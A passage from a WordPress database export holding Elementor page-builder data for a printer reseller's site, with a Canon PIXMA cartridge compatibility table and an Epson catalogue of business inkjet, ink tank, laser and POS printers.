width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3906,2742,'_elementor_version','0.4'),(3909,1486,'_elementor_edit_mode','builder'),(3910,1486,'_elementor_template_type','post'),(3916,1486,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot 